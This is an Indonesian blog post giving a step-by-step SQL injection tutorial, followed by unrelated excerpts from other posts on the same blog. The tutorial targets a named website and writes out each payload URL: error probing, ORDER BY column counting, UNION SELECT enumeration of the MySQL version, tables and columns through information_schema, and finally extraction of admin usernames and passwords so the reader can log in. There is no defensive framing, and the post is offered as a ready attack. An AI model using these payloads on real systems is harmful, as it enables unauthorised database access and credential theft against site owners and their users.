Langsung ke konten utama

3 Langkah SQL Injection

3 Langkah SQL Injection



Langkah-langkah SQL Injection.
http://www.finvent.com/details.php?id=20
1.    Pertama kali yang kita lakukan tentu mencari target. Misalnya target kita kali ini adalah
2.    Tambahkan karakter ‘ pada akhir url atau menambahkan karakter “-” untuk melihat apakah ada pesan error.
Contoh :
http:// www.finvent.com/details.php?id=20’
atau
http:// www.finvent.com/details.php?id=-20
3.    Maka akan muncul pesan error…
“You have an error in your SQL syntax.You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right syntax to use near ”’
at line 1 Dan masih banyak lagi macamnya.
4.    Next step adalah mencari dan menghitung jumlah table yang ada dalam databasenya…
Disini kita akan menggunakan perintah order by
Contoh :
http:// www.finvent.com/details.php?id=20+order+by+3
Hohoho…apalagi itu “/*” ? Itu adalah karakter penutup perintah SQL atau kita juga bisa pake “–“. Terserah aja…
Kalo “+” sebagai penghubung perintah…
5.    Nah sampe sini langsung dah nyobain satu2…
http:// www.finvent.com/details.php?id=20 +order+by+1/* (gak ada error)
http:// www.finvent.com/details.php?id=20 +order+by+2/* (gak ada juga)
http:// www.finvent.com/details.php?id=20 +order+by+3/* (capek dah)
http:// www.finvent.com/details.php?id=20 +order+by+4/* (jangan nyerah)
Sampai muncul error…
Misalkan errornya disini…
http:// www.finvent.com/details.php?id=20 +order+by+10/*
Berarti yang kita ambil adalah “9”
http:// www.finvent.com/details.php?id=20 +order+by+9/*
6.    Untuk mengetahui berapa angka yang show sekarang kita pake UNION
Contoh :
http:// www.finvent.com/details.php?id=20 +union+select+1,2,3,4,5,6,7,8,9/*
Trus perhatikan angka berapa yang keluar.
7.    Misalnya angka hoki yang keluar adalah “3” maka yang bisa akan kita lakukan adalah mengecek versi berapa mysql yang dipake dengan perintah “version()” atau “@@version”
http:// www.finvent.com/details.php?id=20 +union+select+1,2,version(),4,5,6,7,8,9/*
Atau
www.finvent.com/details.php?id=20+union+select+1,2,@@version,4,5,6,7,8,9/*
8.    Nah kalo versinya 5 langsung aja pake perintah “information_schema” untuk melihat tabel dan kolom yang ada pada database…
http://www.finvent.com/details.php?id=20+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.tables/*
Contoh :
Nah katanya kalo untuk melihat tabel-tabel yang lain kita tambahkan LIMIT pada akhir URL.
Misalnya adalah table “admin”
Nah sekarang kita liat-liat dulu kolomnya dengan mengganti aja kata “table”-nya…
Contoh:
http://www.finvent.com/details.php?id=20+union+select+1,2,column_name,4,5,6,7,8,9+from+information_schema.colums/*
Misalnya kolom yang keluar adalah “password” dan “username”
Langsung aja kita liat isinya…
Contoh :
http://www.finvent.com/details.php?id=20+union+select+1,username,3,4,5,6,7,8,9+from+admin/*
dan
http://www.finvent.com/details.php?id=20+union+select+1,password,3,4,5,6,7,8,9+from+admin/*
 Anda dapat melihat username dan password, dan anda dapat login dengan username tersebut.
Semoga Bermanfaat

Komentar

Posting Komentar

Postingan populer dari blog ini

Teks Eksposisi Tentang Kebiasaan Mencontek bagi Pelajar

Teks Eksposisi Tentang Kebiasaan Mencontek bagi Pelajar Tesis Mencontek merupakan hal biasa bagi pelajar, walaupun mencontek merupakan hal tidak baik. Argumentasi Menurut saya setiap orang yang pernah menjadi siswa pasti pernah mencontek saat ujian atau saat mengerjakan tugas. Tetapi mencontek merupakan hal wajar bagi siswa karena mungkin siswa yang mencontek memiliki alasan tertentu mengapa ia mencontek. Sebenarnya mencontek bukan hal baik karena apa yang dilakukan adalah meniru pekerjaan orang lain tanpa diketahui oleh orang yang ditiru dan mencontek merupakan kesalahan besar pencontek karena ia tidak mempersiapkan dengan baik apa yang harus ia kerjakan seperti malas belajar, malas mengerjakan tugas,bahkan mungkin malas berfikir . Berbeda apabila seseorang yang meniru pekerjaan orang lain dengan ijin dari orang yang pekerjaannya ditiru itu bukan mencontek karena menurut saya mencontek adalah meniru tanpa ijin. Penegasan Pend...
Posting Komentar
Baca selengkapnya

Teks Eksposisi TATA TERTIB SMKN 4 PADALARANG

TATA TERTIB SMKN 4 PADALARANG Tesis Aturan itu harus diadakan karena dengan adanya aturan sekolah ditujukan untuk membuat siswa lebih disiplin. Dan aturan bukan untuk di langgar tetapi untuk ditaati agar tujuan dari aturan tersebut dapat berjalan dengan baik. Sudah sangat jelas bahwa di SMKN 4 PADALARANG siswa harus sudah berada di sekolah sebelum pukul 6.45 Argumentasi Tata tertib di SMKN 4 Padalarang ini merurut saya sangat baik seperti siswa harus datang sebelum pukul 6.45 itu akan membuat siswa menjadi disiplin dan menghargai waktu. Tetapi hal tersebut  tidak berlaku bagi siswa yang bertempat tinggal jauh dan sulitnya akses kendaraan seperti jauh dari jalan yang di lewati angkutan umum dan harus berjalan terlebih dahulu yang cukup memakan waktu sehingga harus berangkat lebih pagi, tetapi di perjalanan terhambat oleh macet, atau kendaraan mogok atau kendaraan umum ngetem, atau mungkin harus berpindah kendaraan karena kendaraan...
Posting Komentar
Baca selengkapnya
KEBIJAKAN PENGGUNAAN JARINGAN // KEAMANAN JARINGAN KEBIJAKAN ORGANISASI Model Jaringan Organisasi atau  Organizational Network Model   adalah merupakan model jaringan yang didasarkan pada jaringan kerjasama dari pekerja pekerja lokal dan jarak jauh yang melaksanakan fungsinya. Dalam sebuah enterprise, ini bertujuan agar efisiensi biaya dan fleksibilitas untuk mencapai misi dengan menghilangkan lapisan-lapisan management yang tidak perlu yang umumnya terdapat dalam mode operasi desentralisasi. Pada model ini team eksekutif mengatur kebijakan , tujuan, menyetujui sumberdaya dan mengevaluasi hasil, sedangkan  Functional Team (Tim Fungsional) dan  Independent worker  mengelola program didalam sebuah  line of business  (LOB) yang sedang berjalan, proyek pengembangan baru, dan sumberdaya tim yang khusus. Jadi model organisasi ini, akan menghubungkan dan membagi team secara jelas berdasarkan kepada ruang lingkup tugasnya, dimana te...
1 komentar
Baca selengkapnya